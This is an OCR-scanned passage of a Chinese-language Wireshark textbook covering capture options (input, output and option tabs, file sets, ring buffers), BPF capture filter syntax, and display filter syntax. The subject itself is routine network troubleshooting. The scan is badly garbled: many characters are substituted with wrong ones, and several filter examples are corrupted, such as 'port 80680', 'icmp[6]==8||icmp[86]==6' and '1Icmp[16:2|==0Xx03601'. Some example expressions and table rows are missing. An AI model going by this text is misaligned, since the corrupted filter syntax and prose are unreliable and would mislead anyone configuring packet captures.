惟 了 。 在 图 4-9 所 示 的 例子 当中 ， 我 选择 把 所 有 包 的 时 间 惟 都 加 上 


2minDs。 


题 Wireshark . Time Shift 


spalpadeeby [T000208 | lowe 
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图 4-9 ”时 间 偏 移 窗 口 
4.4 议定 捕获 选项 


在 第 3 章 中 我 们 进行 了 一 次 非常 基础 的 数据 包 捕 医 。Wireshark 在 
Capture Options 对 话 框 中 ， 提 供 了 一 些 额 外 的 捕获 选项 。 要 答 看 这 些 选 
项 ， 只 需 选 择 Capture->Options。 


Capture Options 对 话 框 提供 了 各 种 意 想 不 到 的 选项 ， 为 的 束 古 能 在 
进行 数据 包 捕 获 时 给 予 你 更 多 的 灵活 性 。 这 些 选 项 分 为 3 个 标签 页 : 输 
入 、 输 出 和 和 选项。 下面 将 逐个 予以 说 明 。 


4.4.1 输入 标签 页 


输入 标 丛 页 的 主要 目的 就 是 显示 所 有 可 以 抓 包 的 便 件 接口 和 有 关 这 
些 接 口 的 基本 信息 。 这 些 信息 包括 系统 提供 的 接口 名 字 、 一 个 显示 该 接 
口 厨 吐 量 的 流量 图 ， 以 及 一 些 例 如 混杂 模 陈 状态 和 绥 冲 区 大 小 的 额外 选 
项 《〈 见 图 4-10) 。 在 最 右 列 有 一 个 捕获 过 小 大， 我 们 会 在 后 面 的 4.5.1 小 
市 讲 到 这 个 工具 。 


在 输入 标签 页 区 域 ， 你 可 以 直接 双击 来 修改 接口 的 大 多 数 设 置 。 例 
如 ， 如 果 你 想 茶 用 一 个 接口 的 刘 杂 模式 ， 那 么 只 需要 在 那 一 行 接口 的 廊 
杂 梗 式 下 拉 腕 单 中 选择 disabled 即 可 。 


是 Wireshark . Capture Interfaces 


Input Dutput OQptions 


Interface Traffic 
Bluetooth Network Connec tion 


Enable promiscuous mode on all interfaces 


Capture Filter for selected Interfaces: | Enter a capture fllter ... | | Compile BPFs 


Help 





图 4-10 ”捕获 接口 的 输入 标签 页 
~ 人、 一 AAA 
4.4.2 ”输出 标签 页 


写 传 统 的 先 抓 流量 表 存 文件 的 方式 个 同 的 是 ， 输 出 标 位 页 〈 见 图 4- 
11) 允许 你 把 所 抓 的 流量 包 存 成 一 个 文件 。 这 样 做 可 以 使 管理 捕获 沉 量 
包 的 存储 方式 更 具 录 活性 。 你 可 以 选择 把 流量 包 痢 和 存 成 一 个 文件 、 文 件 
集 或 使 用 环 状 缓冲 《我 们 竺 会 儿 束 会 讲 到 ) 来 控制 创建 文件 的 个 数 。 要 
开局 这 项 功能 ， 可 以 在 文件 文本 框 内 输入 一 个 完整 的 绝对 路 径 和 名 学 ， 
你 也 可 以 通过 使 用 Browse 按钮 来 选择 一 个 日 录 并 给 文件 起 名 。 


当 你 要 捕获 一 个 大 流量 或 者 进行 长 时 间 抓 包 时 ， 文 件 集合 是 你 的 得 
力 带 和 于。 文件 集合 吏 是 按照 特定 的 条 件 组 成 的 多 个 文件 的 分 组 。 要 保存 
成 文件 集合 ， 请 单 击 Create a new file automatically after... 选项 。 


Wireshark 使 用 多 个 不 同 的 基于 时 间或 文件 大 小 的 触发 堪 ， 来 寡 理 
人 和 存 为 文件 集合 。 要 想 开 局 其 中 的 一 个 触 友 禹 ， 可 以 选中 该 触 友 问 ， 用 
小 家 涉 按钮 调 市 比率 大 小 并 选择 单位 。 如 图 4-12 所 示 ， 你 可 以 把 触 友 此 
设置 为 每 抓 取 1MB 的 流量 吏 新 人 存 一 个 文件 ， 或 者 每 过 1min 殉 新 存 一 个 文 


i 


是 Wireshark .Capture Interfaces 


Input Output 。， OQptions 


Output format: 各) Fcapnig 站 pcap 








Capture to a permanent fille 


File: |C:/Users/cChris Sanders/Desktop/packets,pcap Browse... 


Lreate a new flle automatcally atter... 


[DD] Use a ring buffer with fles 





图 4-11 捕获 接口 的 输出 标签 页 


Narme Date modified 


| intervalcapture_O0001_20151009141804 10/9/2017 2:19 PM 
[|] intervalcapture_O0002_20151009141904 10/9/2017 2:20 PM 


| | intervalcapture_00003_20151009142004 10/9/2017 2:21 PM 
| intervalcapture_00004_20151009142104 10/9/2017 2:22 PM 
| intervalcapture_00005_20151009142204 10/9/2017 2:23 PM 
| | intervalcapture 00006_20151009142304 1079/2017 2:24 PM 











图 4-12 ”Wireshark 每 隔 1min 建 立 的 文件 集合 


使 用 ring buffer〈 环 状 缓冲 ) 允许 你 指定 一 个 特定 的 文件 数量 ， 一 
旦 超过 了 这 个 数量 ，Wireshatrk 束 会 用 新 数据 履 寺 最 老 的 数据 。 昌 然 环 状 
绥 冲 有 多 音 合 义 ， 但 在 这 里 指 的 是 一 旦 最 后 的 文件 锐 写 满 了 了 ， 则 此 一 个 
文件 束 会 被 履 新 。 换 人 句 话说 ， 这 实现 了 一 个 先进 和 完 出 (FIFO)〉 的 写 入 数 
据 到 文件 的 方式 。 你 可 以 选中 这 个 功能 ， 然 后 设置 一 个 你 想 要 回 写 的 文 
件 的 最 大 数量 。 举 例 来 说 ， 如 条 你 选择 使 用 文件 集合 并 且 每 隔 1h 创 建 一 
个 靳 文件 ， 并 且 你 设置 了 坏 状 绥 冲 值 为 6。 一 旦 第 6 个 文件 个 生成 ， 则 环 
状 绥 冲 将 循环 返回 并 宪 蓄 第 一 个 文件 ， 而 不 十 狐 建 第 七 个 文件 。 这 个 机 
制 保证 了 在 不 断 有 新 文件 写 入 的 同时 叉 不 会 持续 增加 文件 的 数量 。 


在 输出 标签 页 上 你 也 可 以 设 定 最 终 文件 保存 的 格式 是 否 使 
用 .pcapng。 如 果 你 有 对 该 格式 不 羔 容 的 第 三 方 工 具 的 话 ， 则 可 以 选 
择 .pcap 格 式 。 


4.4.3 ”选项 标签 页 


选项 标签 页 包 含 看 一 些 其 他 的 抓 包 设 置 ， 包 括 显 示 选 项 、 解 析 名 称 
和 目 动 停止 捕获 ， 如 图 4-13 所 未 。 


帮 Wireshark . Capture Interfaces 


Input Output Options 

Display Options Name Resolution 
[update list of packets in real-time Resolve MAC Addresses 
MA Automatically scroll during live capture [DL] Resolve network names 
MM Show extra capture information dialog DL] Resolve transport names 




















图 4-13 ”捕获 接口 的 选项 标签 页 
1. 显示 选项 


Display 选 项 部 分 用 来 控制 捕获 的 数据 包 如 何 进行 显示 。Update list 
of packets in real time 选 项 的 名 字 束 一 目 了 然 了 了， 并 且 它 可 以 和 Automatic 
scrolling in live capture 一同 使 用 。 中 。 在 这 两 个 选项 启用 之 后 ， 所 有 捕 
区 的 数据 包 都 会 显示 在 屏 雁 上， 并 且 新 捕获 的 数据 包 会 会 立刻 显示 出 来 。 


ae 
| 


1 


当 Update list of packets in real time 和 Automatic scrolling in live capture 选 项 都 被 选中 并 且 
捕获 一 定数 量 的 数据 包 时 ， 将 会 对 处 理 器 庆生 相当 的 负担 。 除 非 你 必须 要 实时 僵 看 数据 包 ， 
侍 则 最 好 将 这 两 个 选项 都 取消 挥 。 





Show extra capture info dialog 选 项 允许 你 局 用 或 屏 菩 挥 根据 协议 显 


示 数 据 包 数量 和 比率 的 小 窗口 。 我 辟 欢 打开 这 一 选项 把 ， 因 为 我 通 帅 不 
叶 欢 在 捕获 流量 的 时 候 满 屏 深 动 看 数据 包 。 


2. 名 称 解 析 选 项 


Name Resolution 选 项 允许 你 在 捕获 中 ， 局 用 目 动 的 数据 链 路 层 〈 第 
2 层 ) 、 网 络 层 《第 3 层 ) 和 传输 层 〈 第 4 层 ) 的 名 称 解析 。 我 们 将 在 第 5 
章 深 入 地 讨论 Wireshark 的 名 称 解 析 及 其 不 足 。 


3， 俘 止 捕获 选项 


Stop capture 选 项 允许 你 在 满足 一 定 的 触 用 条件 时 停止 正在 进行 的 捕 

锋 。 与 多 文件 集中 的 情形 类 似 ， 你 可 以 使 用 文件 大 小 、 时 间 间 隅 或 者 数 

ee 的 数目 作为 触 友 条 件 。 这 些 选 项 可 以 与 之 前 介绍 的 多 文件 捕获 一 起 
用 。 


4.5 过 滤器 


过 涛 需 人 允许 你 找 出 所 和 希望 进行 分 析 的 数据 包 。 人 简单 来 说 ， 一 个 过 滤 
全 吏 是 定义 了 一 定 的 条 件 ， 用 来 包 售 或 者 排除 满足 目 定 义 条 件 的 数据 包 
的 表达 式 。 如 果 你 不 希望 看 到 一 些 数据 包 ， 则 可 以 写 一 个 过 滤 右 来 屏 节 
它们 ;如果 你 和 希望 只 看 到 某 些 数据 包 ， 则 可 以 写 一 个 过 滤 需 来 只 显示 出 
这 些 数据 包 。 
Wireshark 主 要 提供 两 种 主要 的 过 沽 二 。 
。 捕获 过 滤 颖 : 当 进 行 数据 包 捕 获 时 ， 只 有 那些 满足 给 定 的 包含 / 排 
除 表 达 式 的 数据 包 会 被 捕获 。 
。 时 不 过 滤 右 : 该 过 小 需 根 据 指 定 的 表达 式 用 于 一 个 已 捕 煞 的 数据 包 
oad 它 将 隐 世 不想 显示 的 数据 包 ， 或 者 只 显示 那些 需要 的 数据 
已 。 


我 们 先 看 一 下 捕获 过 小 章 。 


4.5.1 捕 儿 过滤 可 


捕获 过 滤 问 用 于 进行 数据 包 捕 获 的 实际 场合 ， 使 用 它 的 一 个 主要 原 
因 束 古 性 能 。 如 末 你 并 不 需要 分 析 和 个 类 型 的 流量 ， 则 可 以 人 简单 地 使 用 
捕获 过 渡 故 过 滤 挥 它 ， 从 而 市 管 那些 会 钻 用 来 捕获 这 些 数据 包 的 处 理 右 


当 处 理 大 量 数据 的 时 候 ， 创 建 自 定义 的 捕获 过 滤器 是 相当 好 用 的 。 
它 可 以 让 你 专注 于 那些 与 你 手头 事情 有 关 的 数据 包 ， 从 而 加 速 分 析 过 


程 。 


举 一 个 简单 的 例子 ， 你 在 一 台 有 多 种 角色 的 服务 右上 捕获 流量 时 很 
可 能 会 用 到 捕获 过 滤 硕 ， 假 设 你 正在 解决 一 个 运行 于 262 端 口 网 络 服务 
的 问题 ， 如 采 你 正在 分 析 的 那 台 服务 天 在 许多 奖 口 运行 了 各 种 不 同 的 网 
络 服务 ， 那 么 找到 并 分 析 只 运行 于 262 并 口 的 流量 本 和 刁 可 能 就 具有 一 定 
的 工作 量 。 你 可 以 通过 本 章 前 面 讨 论 过 的 Capture Options 对 话 框 到 达 目 
的 ， 步 又 如 下 所 示 。 


(1) 选择 Capture -> Options 按 钮 打开 捕获 接口 对 话 框 。 


(2) 选择 你 想 进行 数据 包 捕获 的 设备 ， 然 后 在 最 右 列 选中 捕获 过 
滤器 。 


(3) 你 可 以 单 击 该 列 以 输入 一 个 表达 式 来 应 用 捕获 过 滤 磊 。 我 们 
希望 过 滤器 只 显示 出 262 端 口 的 出 站 和 入 站 流量 ， 所 以 如 图 4-14 所 示 ， 
输入 port 262《〈 我 们 将 在 下 一 区 段 中 仔细 地 讨论 关于 过 滤 表 达 却 的 问 
题 ) 。 如 果 你 输入 的 表达 云 合 法 ， 那 么 方 格 里 的 字 两 色 应 该 会 变 绿 ; 合 
则 会 变 红 色 。 





帮 Wireshark . Capture Interfaces ? xX 


Input Output Options 








Interface Traffic Link-layer Header Promiscuous Snaplen (B) Buffer (MB) Capture Filter 
UsBpcap1 nan enabled default 2 
USBPcap2 USBPcap enabled default 2 
USBPcap3 USBPcap enabled default 2 
Local Area Connec tion* 2 .Ethernet enabled default 2 
Ethernet 2 Ethernet enabled default 2 
Bluetooth Network Connection _ Ethernet enabled default 2 
Ethernet Ethernet enabled default 2 
Ethernet 3 Ethernet enabled default 2 
Wi-Fi Ethernet enabled default 2 | port 262| 














Enable promiscuous mode on all irterfaces 





Capture Filter for selected Interfaces: | Enter a capture filter v | Compile BPFs 














图 4-14 ”在 Capture Options 对 话 框 中 创建 一 个 捕获 过 小 占 


(4) 当 你 设 定 好 过 小 如 之 后 ， 早 击 Start 开 始 捕 获 。 


当 收集 到 足够 多 的 样本 之 后 ， 你 应 该 只 看 见 了 端口 262 的 流量 ， 这 
样 就 能 更 有 效率 地 分 析 这 些 数据 了 。 


1. 捕获 过 滤 需 的 BPEF 语 法 


捕获 过 滤 硕 应 用 于 libpcap/WinPcap， 并 使 用 Berkeley Packet 
Filter(BPP) 语 读 。 这 个 语法 被 广泛 用 于 多 种 数据 包 别 探 软件 ， 主 要 因为 
大 部 分 数据 包 唱 探 软 件 都 依赖 于 使 用 BPF 的 libpcap/WinPcap 库 。 和 区 握 
BPF 语 法 对 你 在 数据 包 级 别 更 深入 地 探索 网 络 来 说 ， 非 第 天 键 。 


使 用 BPF 语 法 创建 的 过 滤 亏 委 称 为 expression (表达 式 ) ， 并 且 每 个 
表达 式 包 含 一 个 或 多 个 primitives 〈 原 语 〉。 每 个 原 语 包 含 一 个 或 多 个 
qualifiers 《限定 词 ，， 然 后 跟着 一 个 ID 名 字 或 者 数字 〈 见 表 4-2〉 ， 如 图 
4-15 所 示 。 


表 4-2 BPF 限 定 词 


例子 











限定 所 要 匹配 的 协议 Ether、 ip、tcp、udp、http、ftp 


原 语 操作 符 ”限定 词 


广 fr 一 人 


dst host 192.168.0.10&& tcp port 80 


A WU 


限定 词 限定 词 A 限定 词 限定 词 所 





图 4-15 一 个 捕获 过 滤 占 样 例 


在 给 定 表 达 式 的 组 成 部 分 中 ， 一 个 src 限 定 词 和 192.168.0.10 组 成 了 
一 个 原 语 。 这 个 原 语 本 号 束 是 表达 式 ， 可 以 用 它 只 捕获 那些 源 IP 地 址 是 
192.168.0.10 的 流量 。 


你 可 以 使 用 以 下 3 种 逻辑 运算 符 ， 对 原 语 进行 组 合 ， 从 而 创建 更 高 
级 的 表达 式 : 
e。 连接 运算 符 与 〈&&) 
。 选择 运算 从 或 (||) 
。 各 定 运算 人 符 非 “〈! ) 
举例 来 说 ， 下 面 的 这 个 表达 式 只 对 源 地 址 是 192.168.0.10 和 源 端口 
或 目标 端口 是 80 的 流量 进行 捕获 。 
2. 主机 名 和 地 址 过 滤器 


你 所 创建 的 大 多 数 过 滤器 都 会 关注 于 一 个 或 一 些 特定 的 网 络 设备 。 
根据 这 种 情况 ， 你 可 以 根据 设备 的 MAC 地 址 、IPv4 地 址 、IPv6 地 址 或 者 
DNS 主机 名 配置 过 滤 规 则 。 


举例 来 说 ， 假 设 你 对 一 个 正在 和 你 网 络 中 某 个 服务 器 进行 交互 的 主 
机 所 产生 的 流量 感 兴 趣 ， 那 么 你 可 以 在 这 人 台 服 务 左 上 创建 一 个 使 用 host 


限定 词 的 过 小 问 ， 来 捕获 所 有 和 那 台 主机 IPv4 地 址 相关 的 流量 : 


host 172.16.16.149 


如 果 你 在 使 用 一 个 IPv6 网 络 ， 则 可 能 需要 使 用 基于 IPv6 地 址 的 host 
限定 词 ， 如 下 所 示 : 


host 2661:db8:85a3:8a2e:370:7334 
你 同样 可 以 使 用 基于 一 台 设 备 的 主机 名 host 限 定 词 ， 残 像 这 样 : 


host testserver2 


或 者 ， 如 果 你 考虑 到 一 台 主 机 的 IP 地 址 可 能 会 变化 ， 则 可 以 通过 加 
入 ether 协 议 限定 词 ， 对 它 的 MAC 地 址 进行 过 滤 : 


ether host 60-1a-a0@-52-e2-a0 


传输 方 回 限定 词 通 和 党 会 和 前 面 例子 演示 的 那些 过 小 可 一 起 使 用 ， 来 
捕获 流 回 或 者 流出 某 台 主机 的 流量 。 举 例 来 说 ， 如 果 想 捕获 来 自 革 人 台 主 
机 的 流量 ， 则 可 以 加 入 src 限 定 词 : 


src host 172.16.16.149 


如 果 只 想 捕 获 发 往 172.16.16.149 服 务 器 的 流量 ， 则 可 以 使 用 dst 限 定 
合 |: 


dst host 172.16.16.149 


如 果 你 在 一 个 原 语 中 没有 指定 一 种 类 型 限定 从 (host、net 或 者 
port) ，host 限 定 词 将 作为 默认 选择 。 所 以 上 面 的 那个 例子 也 可 以 写成 
没有 类 型 限定 从 的 杆子 : 


dst 172.16.16.149 


3， 珊 口 过渡 融 


不 仅仅 可 以 基于 主机 过 滤 ， 你 还 可 以 对 基于 每 个 数据 包 的 端口 进行 
过 滤 。 端 口 过 滤 通 常 被 用 来 过 滤 使 用 已 知 端口 的 服务 和 应 用 。 举 例 来 
说 ， 下 面 是 一 个 只 对 8080 端 口 进行 流量 捕获 的 简单 过 滤器 的 例子 : 


port 80680 


如 来 想 要 捕获 际 8080 跨 口外 的 所 有 流量 ， 则 如 下 所 示 : 


lport 80680 


端口 过 滤器 可 以 和 传输 方向 限定 符 一 起 使 用 。 举 例 来 说 ， 如 果 希 望 
只 捕获 访问 标准 HTTP80 端 口 的 Web 服 务 器 ， 则 可 以 使 用 dst 限 定 符 ; 


4. 协议 过 滤 规 

协议 过 滤 孝 允许 你 基于 特定 协议 进行 数据 包 过 滤 。 这 通 旬 被 用 于 那 
些 非 应 用 层 的 不 能 简单 地 使 用 特定 端口 进行 定义 的 协议 。 所 以 如 果 你 只 
想 看 一 看 ICMP 流 量 ， 则 可 以 使 用 下 面 这 个 过 滤器 : 


如 果 你 想 看 除了 IPv6 之 外 的 所 有 流量 ， 则 下 面 这 个 方式 能 够 满足 要 
5. 协议 域 过 滤 妖 

BPF 语 法 提供 给 我 们 的 一 项 强大 的 功能 ， 束 是 可 以 通过 检查 协议 头 
中 的 每 一 个 字 节 来 创建 基于 那些 数据 的 特殊 过 滤器 。 在 本 节 中 我 们 将 要 


讨论 的 这 些 高 级 的 过 泥 厅 ， 通 过 它们 你 可 以 匹配 一 个 数据 包 中 从 东 一 个 
和 翌 定 位 置 开始 的 一 定数 量 的 字 市 。 


举例 来 说 ， 假 设 我 们 想 要 基于 ICMP 过 滤器 的 类 型 域 进行 过 滤 ， 而 
类 型 域 位 于 数据 包 的 最 开 尖 也 束 古 依 移 量 为 0 的 位 置 ， 堵 么 我 们 可 以 通 
过 在 协议 限定 符 后 输入 由 方 括 喜 括 起 的 字 节 偶 移 量 ， 在 这 个 例子 中 残 是 
icmp[0]， 来 指定 我 们 想 在 一 个 数据 包 内 进行 检查 的 位 置 。 这 样 将 返回 一 
个 1 字 节 的 整 型 值 用 于 比较 。 如 果 只 想 要 得 到 代表 目标 不 可 达 《〈 关 型 3) 
信息 的 ICMP 数 据 包 ， 则 我 们 可 在 过 小 费 表 达 式 中 仿 其 等 于 3， 如 下 所 


人 小 


如 果 只 想 要 检查 代表 echo 请 求 〈( 类 型 8) 或 echo 回 复 〈( 类 型 0) 的 
ICMP 数 据 包 ， 则 可 以 使 用 珊 有 OR 运 算 符 的 两 个 原 语 : 


icmp[6]==8||icmp[86]==6 


里 然 这 些 过 洲 占 很 好 用 ， 但 十 它 们 只 能 基于 数据 包头 部 的 1 个 子 市 
进行 过 滤 。 当 然 ， 你 也 可 以 在 方 括 亏 中 俩 移 值 的 后 面 以 上 时 扎 分隔 加 二 一 
个 字 节 长 度 ， 来 指定 你 希望 返回 给 过 小 郁 表 这 陈 的 数据 长 度 。 


举例 来 说 ， 假 设 我 们 要 创建 一 个 过 滤器 ， 该 过 滤器 捕获 所 有 ICMP 
目标 一 一 不 可 访问 、 主 机 不 可 达 的 数据 包 《〈 交 型 3， 代 但 1) 。 这 些 是 1 
字 市 的 字段 ， 它 们 与 偏 移 量 为 0 的 数据 包头 部 相 邻 。 为 些 ， 我 们 创建 了 
一 个 过 滤器 ， 它 检查 从 数据 包头 部 的 偶 移 量 0 处 开始 的 2 字 节 数据 ， 并 与 
十 六 进 制 值 0301〈 类 型 3， 人 代码 1) 进行 比较 ， 如 下 所 示 : 


1Icmp[16:2|==0Xx03601 


一 个 常用 的 场景 就 是 只 捕获 这 有 RST 标 志 的 TCP 数 据 包 。 我 们 将 在 
第 8 章 深 入 讲述 TCP 的 相关 内 容 ， 而 现在 你 只 需要 知道 TCP 数 据 包 的 标志 
位 在 偏 移 为 13 字 市 的 地 方 。 有 趣 的 是 ， 虽 然 整 个 标志 位 加 在 一 起 是 1 字 
方 ， 但 是 这 个 字 节 中 每 一 比特 位 都 是 一 个 标志 。 在 一 个 TCP 数 据 包 中 ， 
多 个 标志 可 以 被 同时 设置 ， 因 此 多 个 值 可 能 都 代表 RST 位 被 设置 ， 我 们 
不 能 只 通过 一 个 tcp[13] 的 值 来 进行 有 效 过 滤 。 我 们 必须 通过 在 当前 的 原 
语 中 加 入 一 个 单一 的 & 符 亏 ， 来 指定 我 们 和 希望 在 这 个 字 节 中 检查 的 比特 
位 置 。 在 这 个 字 节 中 RST 标 六 所 在 的 比特 位 代表 数字 4， 也 融 是 说 这 个 
就 代表 这 个 标志 被 设置 了 。 过 滤器 看 上 去 是 这 个 样 





tcp[13|]&4==4 


如 朱 硕 望 看 到 所 有 被 设 置 了 PSH 标 总 《比特 位 代表 数字 8) 的 数据 
包 ， 那 么 我 们 的 过 滤 釉 应 议会 将 其 相应 位 症 昔 换 成 这 样 : 


6 捕获 过 滤 硕 表达 式样 例 
你 将 会 友 现 分 析 的 成 败 很 多 时 候 取 决 于 你 能 否 编 写 出 恰当 的 过 滤 
人 骨 。 表 4-3 给 出 了 一 些 我 经 常 使 用 的 捕获 过 小 器 。 


表 4-3 第 用 捕获 过 滤 需 





tcp[13]&2==2 设置 了 SYN 位 的 TCP 数 据 包 
tcp[13]&1==1 设置 了 FIN 位 的 TCP 数 据 包 
tcp[13]==18 TCP SYN-ACK 数 据 包 


ether host 00:00:00:00:00:00 CS a 
(替换 为 你 的 MAC ) 流入 或 流出 你 MAC 地 址 的 流量 





lether host 00:00:00:00:00:00 
( 答 换 为 你 的 MAC ) 不 流入 或 流出 你 MAC 地 址 的 流量 





4.5.2 ”显示 过 滤器 





显示 过 小 需 应 用 于 捕获 文件 ， 用 来 告诉 Wireshark 只 显示 那些 人 符合 过 
小 条 件 的 数据 包 。 你 可 以 在 Packet List 面 板 上 方 的 Eilter 文 本 框 中 ， 输 入 
个 二 示 过 类 礁 。 


显示 过 滤器 比 捕获 过 滤器 更 加 常用 ， 因 为 它 可 以 让 你 对 数据 包 进行 
过 滤 ， 却 并 不 省 略 掉 捕获 文件 中 的 其 他 数据 。 也 就 是 说 如 果 你 想 回 到 原 
先 的 捕获 文件 ， 则 仅仅 需要 清空 显示 过 滤 表 达 式 。 


在 有 些 时 候 ， 你 可 能 会 需要 使 用 显示 过 滤 和 苍 ， 来 清理 过 泪 文 件 中 不 
相关 的 广播 流量 ， 比 如 清理 掉 Packet List 面 板 中 与 当前 的 分 析 问 题 并 没 
有 什么 联系 的 ARP 广 播 ， 但 是 那些 ARP 广 播 之 后 可 能 会 有 用 ， 所 以 最 好 
是 把 他 们 暂时 过 洲 控 ， 而 个 是 删 际 它们 。 


如 果 想 要 过 滤 挥 捕获 窗口 中 所 有 的 ARP 数 据 包 ， 那 么 将 你 的 眠 标 放 
到 Packet List 面 板 上 方 的 Filter 文 本 框 中 ， 然 后 输入 !arp， 残 可 以 从 Packet 


List 和 面板 中 去 挥 所 有 的 ARP 数 据 包 了 ， 如 图 4-16 所 示 。 如 末 想 要 删除 过 
EE 则 可 单 击 X 按 钮 ， 如 来 想 要 你 和 存 过 小 如 的 话 ， 则 可 蛙 击 (+) 按 
hs 





帮 http_google.pcap 一 口 X 
File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 

下 轩 卫 9 针 马 空 奋 吕 | 于 车 QQAQ 琶 

Np EI Epesmn + 





图 4-16 ”使 用 Packet List 面 板 上 方 的 Filter 文 本 框 创建 一 个 显示 过 小 项 


应 用 显示 过 滤器 有 两 种 方法 ， 一 种 是 就 像 刚 才 的 例子 一 样 ， ae 
入 合适 的 语法 表达 式 ; 另 一 种 是 使 用 显示 过 滤 峰 对 话 框 来 选择 构建 ， 这 
人 合 的 一 个 简单 方法 。 让 我 们 来 看 一 看 这 两 种 方法 吧 ， 当先 
从 日 。 


1. 过滤 赦 表达 陈 对 话 框 《〈 简 单方 法 ) 


过 涛 硕 表 达 却 对 话 框 ， 如 图 4-17 所 不 ， 使 得 Wireshark 的 初学 者 也 能 
很 简单 地 创建 捕获 和 显示 过 滤器 。 如 果 想 要 打开 这 个 对 话 框 ， 则 可 以 先 
ne Option 对 话 框 中 单 击 Caputre Filter 控 钮 ， 然 后 单 击 Expression 
按钮 。 


题 Wireshark . Display Filter Expression 


Field Name Relation 


w |Pwd. Internet Protocol Version 4 
ip.addr ,source or Destination Address 
ip.bogus_ip_length . Expert Info 
ip.bogus_ip_version . Expert Info 
ip.checksum . Header checksum 
ip.checksum_bad . Bad 
ip.checksum_bad,expert . Expert |nfo 
ip.checksum_calculated . Calculated Check,,, contains 
ip.checksum_good ,Good matches 
ip.cipso,.categories . Categorles 
ip.cipso.doi . DO 
ip.cipso,.malformed . Expert Info 


ip.cipso.sensitryity level . Sensitryiby Lewel 
ip.cipso.tag_data . Tag data 由 lue (Character string) 


st [sam | 
ipP,EuUr 中 ,CUrrent Route BE 
ip.cur 中 host Current Route Host 
ip.dsfield . Differentiated Services Field 
ip.dsfield,.dscp . Differentiated Services Cod,,, 
ip.dsfield,ecn . Explicit Congestion Notifica,,, 
ip.dst . Destination 
pp: dst_host . Destination Host 
w | Range (offset:length) 





图 4-17 ”Filter Expression 对 话 框 可 以 让 你 很 容易 地 在 Wireshark 中 创建 过 滤器 


对 话 框 左边 列 出 了 所 有 可 用 的 协议 域 ， 这 些 域 指明 了 所 有 可 能 的 过 
滤 条 件 。 如 果 想 创建 一 个 过 滤器 ， 则 可 以 按照 如 下 步 又 操作 。 


(1) 单 击 一 个 协议 劳 边 的 加 号 〈+) ， 以 展开 所 有 与 这 个 协议 相关 
可 作为 条 件 的 域 ， 找 到 你 要 在 过 小 占 中 使 用 的 那 一 项 ， 然 后 单 击 选中 
人 


(2) 选择 一 个 你 想 要 在 选中 条 件 域 和 条 件 值 之 间 建 立 的 关系 ， 比 
如 等 于 、 大 于 和 小 于 等 。 


(3) 通过 输入 一 个 和 你 选中 条 件 域 相关 的 条 件 值 来 创建 过 滤 右 表 
达 式 。 你 可 以 目 己 定义 这 个 值 ， 也 可 以 从 Wireshark 预 定义 的 值 中 选择 一 


A 


(4) 当 你 完成 所 有 上 述 步 又 时 ， 单 击 OK 束 可 以 看 到 你 的 过 小 右 表 
达 式 的 文本 表示 。 


Filter Expression 对 话 框 对 于 初学 者 来 说 很 好 用 ， 但 在 你 熟悉 了 这 一 
僚 规 则 之 后 ， 束 会 友 现 手动 输入 过 滤器 表达 式 更 有 效 京 。 显 不 过 渡 幽 表 
达 式 的 语法 络 构 非 营 简单， 但 功能 十 分 强大 。 


2.， 过 小 帮 表达 式 语 法 结构 〈( 珊 级 方法 ) 


在 使 用 一 段 时 间 的 Wireshark 后 ， 为 了 方 约 时 间 你 希望 在 主 窗口 下 直 
接 使 用 显示 过 小 右 的 语法 。 羡 运 的 是 ， 显 不 过 小 右 的 语法 加 从 一 个 标准 
的 模式 并 且 是 易于 导航 。 在 大 多 数 情 况 下 ， 这 个 语法 模式 以 其 体 协 议 为 
中 心 并 且 遵 从 protocol.feature.subfeature 的 格式 ， 惑 像 你 在 显示 过 小 需 表 
达 式 对 话 框 看 到 的 一 样 。 现 在 让 我 们 来 看 一 看 具体 的 几 个 例子 。 


你 会 经 名 用 到 捕获 或 者 显示 过 滤器 来 对 某 一 个 协议 进行 过 滤 。 举 例 
来 说 ， 如 果 你 要 解决 一 个 TCP 问 题 ， 那 么 你 束 只 希望 看 到 捕获 文件 中 的 
TCP 流 量 。 一 个 简单 的 TCP 过 滤器 就 可 以 解决 这 个 问题 。 

现在 让 我 们 看 一 看 男 外 一 些 情况 。 假 如 为 了 解决 你 的 TCP 问 题 ， 你 
使 用 了 很 多 ping 功 能 ， 因 此 产生 了 很 多 ICMP 激 量 。 你 可 以 通过 !icmp 这 
个 过 滤 可 表达 式 ， 将 你 捕获 文件 中 的 ICMP 流 量 屏 菩 挥 。 


比较 操作 符 允 诗 你 进行 值 的 比较 。 举例 来 说 ， 当 检查 一 个 TCP/IP 网 
络 中 的 问题 时 ， 你 可 能 经 常 需 要 检查 和 某 一 个 IP 地 址 相关 的 数据 包 。 等 
于 操作 符 可 以 让 你 创建 二 个 只 显示 192.168.0.1 这 个 让 地 址 相关 数据 外 的 
过 滤器 


1Ip.addr==192.168.0.1 


现在 假设 你 只 需要 得 看 那些 长 度 小 于 128 字 节 的 数据 包 ， 那 么 你 可 
以 使 用 “小 于 或 等 于 ”操作 符 来 完成 这 个 要 求 ， 其 过 小 带 表达 式 如 下 : 


frame.len<=128 


表 4-4 给 出 了 Wireshark 过 滤器 表达 式 的 比较 操作 人 符 





表 4-4 Wireshark 过 滤器 表达 式 的 比较 操作 人 符 





逻辑 运算 符 可 以 让 你 将 多 个 过 滤器 表达 式 合 并 到 一 个 语句 中 ， 从 而 
极 大 地 提高 过 滤器 的 效率 。 举 例 来 说 ， 如 果 只 想 显 示 两 个 IP 地 址 上 的 数 
据 包 ， 那么 我 们 可 以 使 用 or 操作 符 来 创建 一 个 表达 大 式 ， 只 显示 这 两 个 IP 


地 址 的 数据 包 ， 如 下 : 





1Ip.addr==192.168.0.1 or ip.addr==192.168.0.2 


表 4-5 列 出 了 Wireshark 的 逻辑 操作 符 。 
表 4-5 Wireshark 过 滤器 表达 式 的 迎 辑 操作 符 


其 中 一 个 条 件 被 满足 
没有 条 件 被 满足 


3. 显示 过 滤器 表达 式 实例 








虽然 编 与 过 渡 郁 表达 去 在 概念 上 很 简单 ， 但 是 在 解决 不 同 问 题 时 创 
建 的 过 滤 右 ， 仍 然 需 要 许多 特定 的 关键 词 与 操作 从 。 表 4-6 给 出 了 我 经 
妾 使 用 的 显示 过 滤 右 。 


表 4-6 常用 显示 过 滤器 


ltcp.port==3389 排除 RDP 流 量 


tcp.flags.syn==1 上 其 有 SYN 标 志 位 的 TCP 数 据 包 





tcp.flags.rst==1 具有 RST 标 志 位 的 TCP 数 据 包 


tcp.port==23 || tcp.port==21 文本 常理 流量 〈Telnet 或 FTP ) 


